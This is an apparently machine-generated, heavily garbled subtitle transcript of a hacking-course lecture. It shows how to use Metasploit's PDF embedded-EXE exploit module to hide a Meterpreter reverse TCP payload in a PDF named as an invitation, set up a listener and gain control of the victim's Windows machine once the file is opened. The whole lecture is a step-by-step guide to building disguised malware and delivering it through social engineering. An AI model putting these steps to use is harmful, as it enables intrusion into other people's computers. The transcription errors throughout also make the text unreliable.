1 00:00:10,050 --> 00:00:12,840 Welcome in the US lecture we saw that. 2 00:00:13,020 --> 00:00:20,140 How did black hat hackers hide their preluded in order to get files to hack their devices. 3 00:00:21,310 --> 00:00:31,050 So in this lecture we are going to see how to hide in malware in normal PDL file as you know Delphi 4 00:00:31,140 --> 00:00:34,880 has become really common in everyday work. 5 00:00:35,010 --> 00:00:39,880 It's hard to imagine business proposals without the ups. 6 00:00:40,030 --> 00:00:49,200 The format is usually in almost all companies to share business deals company brokers and even invitation's 7 00:00:50,430 --> 00:00:51,310 previous years. 8 00:00:51,430 --> 00:00:56,430 We are not good for the users as several celebrities. 9 00:00:56,430 --> 00:01:05,220 We had a publisher that such as buffer overflow levity were sent here to worse than nine a lot of the 10 00:01:05,220 --> 00:01:12,970 attacks we had observed trying to abuse the book by using social engineering or by hosting malicious 11 00:01:13,320 --> 00:01:22,640 files on the Internet just the simple act of opening the paedophile would exploit libretti who ultimately 12 00:01:22,660 --> 00:01:30,440 downloaded malicious code from the internet and display it quite a while to trick you into Baloo that 13 00:01:30,800 --> 00:01:32,400 nothing wrong was happening. 14 00:01:34,020 --> 00:01:42,800 As against the injured the percentage of this bag using creating you are already a so let's see how 15 00:01:42,800 --> 00:01:44,280 to do this. 16 00:01:44,280 --> 00:01:54,830 Here we are using a metal plate framework to create a more malicious video file so when criminal and 17 00:01:54,960 --> 00:02:00,890 I and most of console stock let play. 18 00:02:01,060 --> 00:02:11,680 Next we are going to use all on those score of underscore and Belward underscore the Exley underscore 19 00:02:12,270 --> 00:02:19,450 no jealous group promote Ramadi will create our malicious parody of it is a modified version of the 20 00:02:20,110 --> 00:02:25,610 IT ALL media embittered easy social engineering. 21 00:02:25,620 --> 00:02:34,450 This question does not require a script to be enabled and does not required you to be added to the query 22 00:02:34,450 --> 00:02:40,950 of the axes embedded in the PDA in a nonstandard matter. 23 00:02:41,070 --> 00:02:56,670 Using hex and quitting so I use exploit slashed windows slash file format slash arroba underscore Boudia 24 00:02:57,090 --> 00:03:04,710 underscore and Bernard underscore XTi underscore no javascript. 25 00:03:04,740 --> 00:03:07,620 Now lets see the options of this tool. 26 00:03:07,960 --> 00:03:18,120 I show options as a Kensi to report names of our Lord and Pooya file. 27 00:03:18,310 --> 00:03:24,890 If you want to do a different name to your PDL file I said file name. 28 00:03:25,120 --> 00:03:28,820 Now enter the name which you want to do here. 29 00:03:28,860 --> 00:03:35,280 How you an invitation next do we need to start with that type of payload. 30 00:03:35,310 --> 00:03:37,200 We are going to use. 31 00:03:37,430 --> 00:03:48,910 So here we are using Windows slash we do Preter slash rewords underscore DCP now and the local would 32 00:03:49,100 --> 00:03:51,850 be done on the machine. 33 00:03:52,700 --> 00:04:02,960 Similarly to state local port number on which the connection is dual use and for machine I said and 34 00:04:03,000 --> 00:04:15,510 put it in Next I put on to create to you a malicious parody of file as a currency or a file is created 35 00:04:16,110 --> 00:04:19,000 and sirra in dark MSA for Pooler. 36 00:04:20,400 --> 00:04:28,760 Now to see our pillar file go to door for local folder. 37 00:04:28,870 --> 00:04:35,480 Here is our militias really are File next to a need to create a handler to listen. 38 00:04:35,500 --> 00:04:37,680 It was connection. 39 00:04:37,720 --> 00:04:43,320 So back to the terminal and type back. 40 00:04:43,540 --> 00:04:57,870 Now to that handler I use these live handler now to set your payload type set payload windows slash 41 00:04:58,120 --> 00:05:08,950 with the operator slash underscore DCP similarly to set a hoist and airport police and on with him. 42 00:05:09,320 --> 00:05:16,910 I said I'll host one and do not 168 43 dog to say one. 43 00:05:17,290 --> 00:05:28,600 Now that said Alvord I said and put it in a now I ran or explained to start a listener. 44 00:05:28,930 --> 00:05:32,550 Now we are ready to listen and incoming connection. 45 00:05:34,340 --> 00:05:39,250 Here you can see I sent my malicious Boudia file to the machine. 46 00:05:40,200 --> 00:05:42,220 Now let's try to open these 47 00:05:45,170 --> 00:05:47,980 against the easy exit. 48 00:05:47,990 --> 00:05:54,500 Did we take the and we got a deliberate decision in our. 49 00:05:56,300 --> 00:06:00,310 Now from here we can control over war machine. 50 00:06:01,650 --> 00:06:11,310 So that's how the hackers and where they are in normal political files who hack their machines tank.